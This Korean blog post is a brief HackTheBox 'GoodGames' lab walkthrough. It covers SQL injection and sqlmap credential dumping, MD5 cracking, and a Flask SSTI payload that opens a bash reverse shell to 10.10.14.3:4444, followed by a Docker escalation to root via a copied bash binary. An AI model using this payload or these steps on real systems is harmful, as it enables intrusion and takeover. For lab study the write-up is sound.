본문 바로가기

침투테스트/HackTheBox

GoodGames

대상 확인

스캐닝

공격대상 웹 사이트 접근

로컬 호스트 파일에 도메인 추가

SQL Injection으로 admin 로그인

sqlmap 툴을 이용해 계정 정보 탈취

운영 중인 데이터베이스 종류 및 버전, 데이터베이스명 확인
main 데이터베이스의 테이블명 확인
user 테이블에서 계정정보 확인

MD5 복호화

소스코드에서 internal-administration.goodgames.htb url 발견 및 접근 시도

호스트 파일에 주소 추가

플라스크 대시보드 로그인 페이지로 접근

아이디는 admin 패스워드는 superadministrator로 로그인

 SSTI 취약점 이용해서 임의의 명령을 주입해 템플릿 엔진을 조작

SSTI 탐지 페이로드 : {{7*7}}

페이로드 입력

{{ namespace.__init__.__globals__.os.popen('bash -c "bash -i >& /dev/tcp/10.10.14.3/4444 0>&1"').read() }} 입력

쉘 및 플래그 획득

공격 대상은 도커를 운영 중인 것을 확인

도커 아이피 확인

현재 열린 포트 확인

대화형 쉘로 업그레이드

bash 바이너리를 augustus 홈디렉터리에 복사 후 바이너리 소유권 변경, 전체 권한 부여

루트 권한 및 플래그 획득

'침투테스트 > HackTheBox' 카테고리의 다른 글

Previse  (0) 2023.03.01
Curling(~ing)  (0) 2023.02.17
Validation  (0) 2023.01.09
Driver  (0) 2022.12.31
Paper  (0) 2022.12.28